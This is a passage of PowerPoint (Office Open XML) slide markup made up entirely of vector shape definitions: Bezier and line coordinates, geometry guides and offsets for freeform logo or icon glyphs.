                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="32"/>
                      <a:pt x="100" y="29"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="30"/>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7" y="33"/>
                      <a:pt x="66" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="40"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="50"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="69" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="49"/>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3"/>
                      <a:pt x="66" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="54"/>
                      <a:pt x="65" y="56"/>
                      <a:pt x="64" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="58"/>
                      <a:pt x="64" y="59"/>
                      <a:pt x="65" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="61"/>
                      <a:pt x="67" y="61"/>
                      <a:pt x="68" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="66"/>
                      <a:pt x="74" y="66"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="66"/>
                      <a:pt x="87" y="65"/>
                      <a:pt x="91" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="63"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="63"/>
                      <a:pt x="91" y="65"/>
                      <a:pt x="86" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="69"/>
                      <a:pt x="79"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2" y="43"/>
                      <a:pt x="72" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="45"/>
                      <a:pt x="72"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408"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3551" y="424"/>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409"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3564" y="42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Freeform 410"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2004"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411"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2152"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412"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="23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413"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2497"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414"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2692"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415"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2890"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Freeform 416"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3032" y="1108"/>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2"/>
                      <a:pt x="21" y="102"/>
                      <a:pt x="21" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="43"/>
                      <a:pt x="21" y="43"/>
                      <a:pt x="21" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="15"/>
                      <a:pt x="35" y="0"/>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417"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3140" y="1108"/>
                <a:ext cx="77"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7 h 241"/>
                  <a:gd name="T12" fmla="*/ 22 w 64"/>
                  <a:gd name="T13" fmla="*/ 195 h 241"/>
                  <a:gd name="T14" fmla="*/ 22 w 64"/>
                  <a:gd name="T15" fmla="*/ 156 h 241"/>
                  <a:gd name="T16" fmla="*/ 43 w 64"/>
                  <a:gd name="T17" fmla="*/ 121 h 241"/>
                  <a:gd name="T18" fmla="*/ 43 w 64"/>
                  <a:gd name="T19" fmla="*/ 120 h 241"/>
                  <a:gd name="T20" fmla="*/ 22 w 64"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 22 w 64"/>
                  <a:gd name="T23" fmla="*/ 45 h 241"/>
                  <a:gd name="T24" fmla="*/ 0 w 64"/>
                  <a:gd name="T25" fmla="*/ 18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7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="212"/>
                      <a:pt x="22" y="205"/>
                      <a:pt x="22" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="156"/>
                      <a:pt x="22" y="156"/>
                      <a:pt x="22" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="136"/>
                      <a:pt x="29" y="125"/>
                      <a:pt x="43" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="120"/>
                      <a:pt x="43" y="120"/>
                      <a:pt x="43" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="116"/>
                      <a:pt x="22" y="104"/>
                      <a:pt x="22" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="45"/>
                      <a:pt x="22" y="45"/>
                      <a:pt x="22" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="27"/>
                      <a:pt x="15" y="18"/>
                      <a:pt x="0" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="0"/>
                      <a:pt x="42" y="15"/>
                      <a:pt x="42" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="83"/>
                      <a:pt x="42" y="83"/>
                      <a:pt x="42" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="102"/>
                      <a:pt x="49" y="112"/>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418"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3248"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420"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3395"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21"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3590"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22"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3788"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23"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3938"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24"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4085"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5"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4284"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6"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4433" y="1103"/>
              <a:ext cx="82"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7"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4581"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8"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4779"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29"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4926"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30"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5125"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1"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5261" y="1108"/>
              <a:ext cx="188" cy="218"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 188 w 188"/>
                <a:gd name="T1" fmla="*/ 67 h 218"/>
                <a:gd name="T2" fmla="*/ 184 w 188"/>
                <a:gd name="T3" fmla="*/ 85 h 218"/>
                <a:gd name="T4" fmla="*/ 142 w 188"/>
                <a:gd name="T5" fmla="*/ 85 h 218"/>
                <a:gd name="T6" fmla="*/ 131 w 188"/>
                <a:gd name="T7" fmla="*/ 135 h 218"/>
                <a:gd name="T8" fmla="*/ 177 w 188"/>
                <a:gd name="T9" fmla="*/ 135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5 h 218"/>
                <a:gd name="T32" fmla="*/ 48 w 188"/>
                <a:gd name="T33" fmla="*/ 135 h 218"/>
                <a:gd name="T34" fmla="*/ 58 w 188"/>
                <a:gd name="T35" fmla="*/ 85 h 218"/>
                <a:gd name="T36" fmla="*/ 11 w 188"/>
                <a:gd name="T37" fmla="*/ 85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5 h 218"/>
                <a:gd name="T60" fmla="*/ 78 w 188"/>
                <a:gd name="T61" fmla="*/ 85 h 218"/>
                <a:gd name="T62" fmla="*/ 67 w 188"/>
                <a:gd name="T63" fmla="*/ 135 h 218"/>
                <a:gd name="T64" fmla="*/ 110 w 188"/>
                <a:gd name="T65" fmla="*/ 135 h 218"/>
                <a:gd name="T66" fmla="*/ 121 w 188"/>
                <a:gd name="T67" fmla="*/ 8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5"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142" y="85"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112" y="218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50" y="218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30" y="218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="85"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11" y="85"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188" y="67"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="121" y="85"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="78" y="85"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110"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32"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5478"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33"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5904" y="1103"/>
              <a:ext cx="82"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4"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6051"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35"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="62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36"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="639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7"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6547"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38"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6744"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9"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6893"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0"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7043"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1"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7192"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2"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7340"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443"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="753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444"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7686"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445"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5672" y="1096"/>
              <a:ext cx="218" cy="255"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 175 w 179"/>
                <a:gd name="T1" fmla="*/ 173 h 209"/>
                <a:gd name="T2" fmla="*/ 134 w 179"/>
                <a:gd name="T3" fmla="*/ 208 h 209"/>
                <a:gd name="T4" fmla="*/ 81 w 179"/>
                <a:gd name="T5" fmla="*/ 198 h 209"/>
                <a:gd name="T6" fmla="*/ 32 w 179"/>
                <a:gd name="T7" fmla="*/ 201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59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3 h 209"/>
                <a:gd name="T40" fmla="*/ 161 w 179"/>
                <a:gd name="T41" fmla="*/ 152 h 209"/>
                <a:gd name="T42" fmla="*/ 88 w 179"/>
                <a:gd name="T43" fmla="*/ 71 h 209"/>
                <a:gd name="T44" fmla="*/ 102 w 179"/>
                <a:gd name="T45" fmla="*/ 67 h 209"/>
                <a:gd name="T46" fmla="*/ 73 w 179"/>
                <a:gd name="T47" fmla="*/ 79 h 209"/>
                <a:gd name="T48" fmla="*/ 63 w 179"/>
                <a:gd name="T49" fmla="*/ 76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5 h 209"/>
                <a:gd name="T68" fmla="*/ 119 w 179"/>
                <a:gd name="T69" fmla="*/ 171 h 209"/>
                <a:gd name="T70" fmla="*/ 126 w 179"/>
                <a:gd name="T71" fmla="*/ 145 h 209"/>
                <a:gd name="T72" fmla="*/ 126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3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="176"/>
                    <a:pt x="179" y="179"/>
                    <a:pt x="176" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="185"/>
                    <a:pt x="170" y="187"/>
                    <a:pt x="166" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="193"/>
                    <a:pt x="148" y="199"/>
                    <a:pt x="141" y="206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="207"/>
                    <a:pt x="137" y="208"/>
                    <a:pt x="134" y="208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="209"/>
                    <a:pt x="128" y="208"/>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1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="200"/>
                    <a:pt x="18" y="198"/>
                    <a:pt x="11" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="196"/>
                    <a:pt x="7" y="196"/>
                    <a:pt x="5" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="193"/>
                    <a:pt x="0" y="191"/>
                    <a:pt x="1" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="186"/>
                    <a:pt x="2" y="185"/>
                    <a:pt x="2" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="180"/>
                    <a:pt x="4" y="176"/>
                    <a:pt x="3" y="171"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="170"/>
                    <a:pt x="2" y="168"/>
                    <a:pt x="2" y="166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="162"/>
                    <a:pt x="3" y="160"/>
                    <a:pt x="7" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="159"/>
                    <a:pt x="12" y="159"/>
                    <a:pt x="14" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="158"/>
                    <a:pt x="22" y="154"/>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3"/>
                    <a:pt x="4" y="167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="169"/>
                    <a:pt x="6" y="170"/>
                    <a:pt x="6" y="172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="176"/>
                    <a:pt x="8" y="179"/>
                    <a:pt x="6" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="184"/>
                    <a:pt x="5" y="186"/>
                    <a:pt x="4" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="190"/>
                    <a:pt x="4" y="191"/>
                    <a:pt x="7" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="193"/>
                    <a:pt x="11" y="193"/>
                    <a:pt x="13" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="196"/>
                    <a:pt x="35" y="199"/>
                    <a:pt x="45" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="203"/>
                    <a:pt x="52" y="204"/>
                    <a:pt x="55" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="202"/>
                    <a:pt x="66" y="197"/>
                    <a:pt x="65" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="185"/>
                    <a:pt x="62" y="182"/>
                    <a:pt x="60" y="178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="169"/>
                    <a:pt x="49" y="160"/>
                    <a:pt x="42" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="149"/>
                    <a:pt x="37" y="147"/>
                    <a:pt x="35" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="143"/>
                    <a:pt x="29" y="142"/>
                    <a:pt x="27" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="145"/>
                    <a:pt x="25" y="144"/>
                    <a:pt x="25" y="143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="140"/>
                    <a:pt x="24" y="136"/>
                    <a:pt x="25" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="132"/>
                    <a:pt x="26" y="131"/>
                    <a:pt x="27" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="124"/>
                    <a:pt x="32" y="118"/>
                    <a:pt x="35" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="106"/>
                    <a:pt x="39" y="99"/>
                    <a:pt x="43" y="94"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="90"/>
                    <a:pt x="49" y="86"/>
                    <a:pt x="52" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="80"/>
                    <a:pt x="56" y="76"/>
                    <a:pt x="58" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="70"/>
                    <a:pt x="60" y="67"/>
                    <a:pt x="60" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="57"/>
                    <a:pt x="59" y="51"/>
                    <a:pt x="59" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="38"/>
                    <a:pt x="58" y="32"/>
                    <a:pt x="58" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="16"/>
                    <a:pt x="63" y="8"/>
                    <a:pt x="73" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="0"/>
                    <a:pt x="81" y="0"/>
                    <a:pt x="85" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="0"/>
                    <a:pt x="97" y="1"/>
                    <a:pt x="102" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="6"/>
                    <a:pt x="114" y="11"/>
                    <a:pt x="117" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="23"/>
                    <a:pt x="122" y="29"/>
                    <a:pt x="122" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="39"/>
                    <a:pt x="122" y="43"/>
                    <a:pt x="123" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="61"/>
                    <a:pt x="128" y="74"/>
                    <a:pt x="138" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="97"/>
                    <a:pt x="156" y="112"/>
                    <a:pt x="159" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="133"/>
                    <a:pt x="161" y="138"/>
                    <a:pt x="160" y="143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="144"/>
                    <a:pt x="159" y="145"/>
                    <a:pt x="159" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="147"/>
                    <a:pt x="158" y="147"/>
                    <a:pt x="157" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="148"/>
                    <a:pt x="154" y="150"/>
                    <a:pt x="153" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="154"/>
                    <a:pt x="149" y="156"/>
                    <a:pt x="147" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="160"/>
                    <a:pt x="139" y="160"/>
                    <a:pt x="135" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="158"/>
                    <a:pt x="132" y="157"/>
                    <a:pt x="131" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="153"/>
                    <a:pt x="129" y="152"/>
                    <a:pt x="128" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="149"/>
                    <a:pt x="126" y="147"/>
                    <a:pt x="125" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="148"/>
                    <a:pt x="122" y="149"/>
                    <a:pt x="121" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="155"/>
                    <a:pt x="120" y="159"/>
                    <a:pt x="121" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="170"/>
                    <a:pt x="123" y="178"/>
                    <a:pt x="122" y="186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="188"/>
                    <a:pt x="121" y="191"/>
                    <a:pt x="122" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="201"/>
                    <a:pt x="129" y="204"/>
                    <a:pt x="136" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="201"/>
                    <a:pt x="142" y="199"/>
                    <a:pt x="144" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="191"/>
                    <a:pt x="158" y="188"/>
                    <a:pt x="165" y="186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="185"/>
                    <a:pt x="170" y="183"/>
                    <a:pt x="173" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="182"/>
                    <a:pt x="174" y="181"/>
                    <a:pt x="175" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
